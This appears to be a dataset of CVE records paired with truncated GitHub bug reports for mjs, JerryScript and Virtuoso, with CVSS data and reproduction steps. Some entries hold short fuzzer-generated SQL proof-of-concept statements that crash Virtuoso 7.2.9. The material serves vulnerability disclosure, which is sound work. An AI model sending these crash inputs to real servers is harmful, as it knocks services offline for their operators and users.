Heap buffer overflow in mjs at function mjs_mk_string in mjs.c:13671. ## Environment Ubuntu 18.04, 64 bit ## Steps to reproduce 1. download file ``` git clone https://github.com/cesanta/mjs.git mjs cd mjs git checkout 9eae0e6 ``` 2. compile libming with ASAN ``` clang -fsanitize=address mjs.c -o mjs_asa...
Heap buffer overflow in mjs_mk_string() at mjs.c:13671
https://api.github.com/repos/cesanta/mjs/issues/244/comments
0
2023-03-22T09:15:39Z
2023-03-22T09:15:39Z
https://github.com/cesanta/mjs/issues/244
1,635,358,781
244
CVE-2023-30088
2023-05-09T16:15:14.583
An issue found in Cesanta MJS v.1.26 allows a local attacker to cause a denial of service via the mjs_execute function in mjs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/cesanta/mjs/issues/243" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cesanta:mjs:1.26:*:*:*:*:*:*:*", "matchCriteriaId": "25C97820-C80A-41CE-B510-F292D2AF665E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding":...
https://github.com/cesanta/mjs/issues/243
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "cesanta", "mjs" ]
Invalid memory read in mjs at function mjs_execute in mjs.c:9320. ## Environment Ubuntu 18.04, 64 bit ## Steps to reproduce 1. download file ``` git clone https://github.com/cesanta/mjs.git mjs cd mjs git checkout d6c06a6 ``` 2. compile libming with ASAN ``` clang -fsanitize=address mjs.c -o mjs_asan `...
Invalid memory read in mjs_execute() at mjs.c:9320
https://api.github.com/repos/cesanta/mjs/issues/243/comments
1
2023-03-22T09:15:01Z
2023-05-15T14:19:13Z
https://github.com/cesanta/mjs/issues/243
1,635,357,898
243
CVE-2023-31906
2023-05-10T15:15:10.187
Jerryscript 3.0.0(commit 1a2c047) was discovered to contain a heap-buffer-overflow via the component lexer_compare_identifier_to_chars at /jerry-core/parser/js/js-lexer.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5066" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
https://github.com/jerryscript-project/jerryscript/issues/5066
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: https://github.com/jerryscript-project/jerryscript/commit/1a2c04763aba49f52b1537acd3730098c873511c Version: v3.0.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --debug --compile-flag=-m32...
heap-buffer-overflow in lexer_compare_identifier_to_chars
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5066/comments
0
2023-04-08T12:50:49Z
2023-04-08T12:50:49Z
https://github.com/jerryscript-project/jerryscript/issues/5066
1,659,514,220
5,066
CVE-2023-31907
2023-05-10T15:15:10.353
Jerryscript 3.0.0 was discovered to contain a heap-buffer-overflow via the component scanner_literal_is_created at /jerry-core/parser/js/js-scanner-util.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5073" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
https://github.com/jerryscript-project/jerryscript/issues/5073
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7 Version: v3.0.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --compile-flag=-m32 --compi...
heap-buffer-overflow in scanner_literal_is_created
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5073/comments
0
2023-04-19T12:27:29Z
2023-04-19T12:27:29Z
https://github.com/jerryscript-project/jerryscript/issues/5073
1,674,802,543
5,073
CVE-2023-31908
2023-05-10T15:15:10.533
Jerryscript 3.0 (commit 05dbbd1) was discovered to contain a heap-buffer-overflow via the component ecma_builtin_typedarray_prototype_sort.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5067" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "6DB8D818-8F21-4FD3-8D4D-A024A6346CB4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStart...
https://github.com/jerryscript-project/jerryscript/issues/5067
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: 05dbbd13[](05dbbd134c3b9e2482998f267857dd3722001cd7) Version: v3.0.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --c...
heap-buffer-overflow in ecma_builtin_typedarray_prototype_sort
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5067/comments
0
2023-04-08T13:31:08Z
2023-04-08T13:39:28Z
https://github.com/jerryscript-project/jerryscript/issues/5067
1,659,524,592
5,067
CVE-2023-31910
2023-05-10T15:15:10.697
Jerryscript 3.0 (commit 05dbbd1) was discovered to contain a heap-buffer-overflow via the component parser_parse_function_statement at /jerry-core/parser/js/js-parser-statm.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5076" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
https://github.com/jerryscript-project/jerryscript/issues/5076
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: 05dbbd13[](05dbbd134c3b9e2482998f267857dd3722001cd7) Version: v3.0.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --c...
heap-buffer-overflow in parser_parse_function_statement
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5076/comments
0
2023-04-23T16:01:47Z
2023-04-23T16:01:47Z
https://github.com/jerryscript-project/jerryscript/issues/5076
1,680,076,342
5,076
CVE-2023-31913
2023-05-12T14:15:09.773
Jerryscript 3.0 *commit 1a2c047) was discovered to contain an Assertion Failure via the component parser_parse_class at jerry-core/parser/js/js-parser-expr.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5061" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
https://github.com/jerryscript-project/jerryscript/issues/5061
[ "Exploit", "Vendor Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: https://github.com/jerryscript-project/jerryscript/commit/1a2c04763aba49f52b1537acd3730098c873511c Version: v3.0.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --debug --compile-flag=-m32...
Assertion 'context_p->scope_stack_size == PARSER_MAXIMUM_DEPTH_OF_SCOPE_STACK' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_class):1068.
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5061/comments
0
2023-04-06T10:46:13Z
2023-04-06T10:46:13Z
https://github.com/jerryscript-project/jerryscript/issues/5061
1,657,176,424
5,061
CVE-2023-31914
2023-05-12T14:15:09.807
Jerryscript 3.0 (commit 05dbbd1) was discovered to contain out-of-memory issue in malloc.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5071" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
https://github.com/jerryscript-project/jerryscript/issues/5071
[ "Exploit", "Vendor Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: https://github.com/jerryscript-project/jerryscript/commit/05dbbd134c3b9e2482998f267857dd3722001cd7 Version: v3.0.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --debug --compile-flag=-m32...
AddressSanitizer: allocator is out of memory trying to allocate
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5071/comments
0
2023-04-19T11:36:46Z
2023-04-19T11:36:46Z
https://github.com/jerryscript-project/jerryscript/issues/5071
1,674,723,917
5,071
CVE-2023-31916
2023-05-12T14:15:09.847
Jerryscript 3.0 (commit 1a2c047) was discovered to contain an Assertion Failure via the jmem_heap_finalize at jerry-core/jmem/jmem-heap.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5062" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
https://github.com/jerryscript-project/jerryscript/issues/5062
[ "Exploit", "Vendor Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: https://github.com/jerryscript-project/jerryscript/commit/1a2c04763aba49f52b1537acd3730098c873511c Version: v3.0.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --debug --compile-flag=-m32...
Assertion 'JERRY_CONTEXT (jmem_heap_allocated_size) == 0' failed at jerryscript/jerry-core/jmem/jmem-heap.c(jmem_heap_finalize):108.
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5062/comments
0
2023-04-06T13:12:15Z
2023-04-06T13:12:15Z
https://github.com/jerryscript-project/jerryscript/issues/5062
1,657,404,755
5,062
CVE-2023-31918
2023-05-12T14:15:09.890
Jerryscript 3.0 (commit 1a2c047) was discovered to contain an Assertion Failure via the parser_parse_function_arguments at jerry-core/parser/js/js-parser.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5064" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
https://github.com/jerryscript-project/jerryscript/issues/5064
[ "Exploit", "Vendor Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: https://github.com/jerryscript-project/jerryscript/commit/1a2c04763aba49f52b1537acd3730098c873511c Version: v3.0.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --debug --compile-flag=-m32...
Assertion 'context_p->next_scanner_info_p->type == SCANNER_TYPE_FUNCTION' failed at jerryscript/jerry-core/parser/js/js-parser.c(parser_parse_function_arguments)
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5064/comments
0
2023-04-06T14:02:51Z
2023-04-06T14:02:51Z
https://github.com/jerryscript-project/jerryscript/issues/5064
1,657,488,796
5,064
CVE-2023-31919
2023-05-12T14:15:09.927
Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the jcontext_raise_exception at jerry-core/jcontext/jcontext.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Vendor Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5069" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
https://github.com/jerryscript-project/jerryscript/issues/5069
[ "Exploit", "Vendor Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: 05dbbd13[](05dbbd134c3b9e2482998f267857dd3722001cd7) Version: v3.0.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-poi...
Assertion '!jcontext_has_pending_exception ()' failed at /jerryscript/jerry-core/jcontext/jcontext.c(jcontext_raise_exception):88.
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5069/comments
0
2023-04-16T13:13:26Z
2023-04-16T13:13:26Z
https://github.com/jerryscript-project/jerryscript/issues/5069
1,669,965,859
5,069
CVE-2023-31920
2023-05-12T14:15:09.963
Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the vm_loop at jerry-core/vm/vm.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5070" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
https://github.com/jerryscript-project/jerryscript/issues/5070
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: 05dbbd13[](05dbbd134c3b9e2482998f267857dd3722001cd7) Version: v3.0.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-poi...
Assertion 'ecma_find_named_property (func_obj_p, ecma_get_magic_string (LIT_MAGIC_STRING_NAME)) == NULL' failed at /jerryscript/jerry-core/vm/vm.c(vm_loop):2173.
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5070/comments
0
2023-04-19T03:29:02Z
2023-04-19T03:29:02Z
https://github.com/jerryscript-project/jerryscript/issues/5070
1,674,113,082
5,070
CVE-2023-31921
2023-05-12T14:15:10.007
Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the ecma_big_uint_div_mod at jerry-core/ecma/operations/ecma-big-uint.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ], "url": "https://github.com/jerryscript-project/jerryscript/issues/5068" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jerryscript:jerryscript:3.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "B1A23519-19ED-4F75-9CAA-42057F88EDE5", "versionEndExcluding": null, "versionEndIncluding": null, "versionSta...
https://github.com/jerryscript-project/jerryscript/issues/5068
[ "Exploit", "Issue Tracking", "Patch", "Vendor Advisory" ]
github.com
[ "jerryscript-project", "jerryscript" ]
###### JerryScript revision Commit: 05dbbd13[](05dbbd134c3b9e2482998f267857dd3722001cd7) Version: v3.0.0 ###### Build platform Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64) ###### Build steps ```sh python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-poi...
Assertion 'dividend_end_p[0] == divisor_high && dividend_end_p[-1] < divisor_high' failed at /jerryscript/jerry-core/ecma/operations/ecma-big-uint.c(ecma_big_uint_div_mod)
https://api.github.com/repos/jerryscript-project/jerryscript/issues/5068/comments
0
2023-04-08T14:19:33Z
2023-04-08T14:19:33Z
https://github.com/jerryscript-project/jerryscript/issues/5068
1,659,537,585
5,068
CVE-2023-31607
2023-05-15T15:15:11.573
An issue in the __libc_malloc component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1120" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1120
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1(x VARCHAR, k VARCHAR); CREATE INDEX t1i1 ON t1(c1,c2,c3,c4,c5,c6,c7,c8,c9,c10,c11,c12,c13,c14,c15,c16,c17,c18,c19,c20,c21,c22,c23,c24,c25,c26,c27,c28,c29,c30,c31,c32,c33,c34,c35,c36,c37,c38,c39,c40,c41,c42,c43,c44,c45,c46,c47,c48,c49,c50,c51,c52,c53,c54,...
virtuoso 7.2.9 crashed at __libc_malloc
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1120/comments
0
2023-04-12T18:42:34Z
2023-04-14T08:12:11Z
https://github.com/openlink/virtuoso-opensource/issues/1120
1,665,064,064
1,120
CVE-2023-31608
2023-05-15T15:15:11.623
An issue in the artm_div_int component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1123" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1123
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL SELECT CAST('-9223372036854775808' AS INTEGER) / CAST('-1' AS SMALLINT); ``` backtrace: ```c #0 0xc227a4 (artm_div_int+0xf4) #1 0xc23766 (artm_vec+0x7d6) #2 0x7518c2 (code_vec_run_v+0x10e2) #3 0x7ac3ff (qn_input+0x38f) #4 0x7ac8a6 (qn_send_output+0x236) #5 0x81e...
virtuoso 7.2.9 crashed at artm_div_int
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1123/comments
0
2023-04-12T18:49:08Z
2023-04-14T08:12:12Z
https://github.com/openlink/virtuoso-opensource/issues/1123
1,665,072,694
1,123
CVE-2023-31609
2023-05-15T15:15:11.673
An issue in the dfe_unit_col_loci component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1126" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1126
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE b ( folders VARCHAR(80), folderid VARCHAR(80), parentid VARCHAR(80), rootid VARCHAR(80), c INTEGER, path VARCHAR(80), id VARCHAR(80), i VARCHAR(80), d VARCHAR(80), e VARCHAR(80), f ...
virtuoso 7.2.9 crashed at dfe_unit_col_loci
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1126/comments
1
2023-04-12T18:58:35Z
2023-04-17T19:06:54Z
https://github.com/openlink/virtuoso-opensource/issues/1126
1,665,085,302
1,126
CVE-2023-31610
2023-05-15T15:15:11.720
An issue in the _IO_default_xsputn component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1118" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1118
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t2(x VARCHAR, y VARCHAR, c VARCHAR); CREATE VIEW t2 AS SELECT * FROM t2; INSERT INTO t2 VALUES(8,8,RDF_SYS.xsd_hexBinary_fromBinary(SYSTEM_BASE64_ENCODE(zeroblob(200)))); ``` backtrace: ```c #0 0x7f87bcd56050 (_IO_default_xsputn+0xa0) #1 0x7f87bcd3b0f...
virtuoso 7.2.9 crashed at _IO_default_xsputn
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1118/comments
0
2023-04-12T18:33:19Z
2023-04-14T08:12:10Z
https://github.com/openlink/virtuoso-opensource/issues/1118
1,665,051,847
1,118
CVE-2023-31611
2023-05-15T15:15:11.770
An issue in the __libc_longjmp component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1119" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1119
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE hist ( cnt VARCHAR NOT NULL, y VARCHAR NOT NULL, z VARCHAR, PRIMARY KEY (cnt,y) ); CREATE TABLE t19d AS (SELECT * FROM hist UNION ALL SELECT 1234); ``` backtrace: ```c #0 0x7f523bf87dbe (__libc_longjmp+0xde) #1 0x5177d573a547bfaf -- no sym...
virtuoso 7.2.9 crashed at __libc_longjmp
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1119/comments
0
2023-04-12T18:38:29Z
2023-04-14T08:12:10Z
https://github.com/openlink/virtuoso-opensource/issues/1119
1,665,059,115
1,119
CVE-2023-31612
2023-05-15T15:15:11.813
An issue in the dfe_qexp_list component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1125" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
https://github.com/openlink/virtuoso-opensource/issues/1125
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
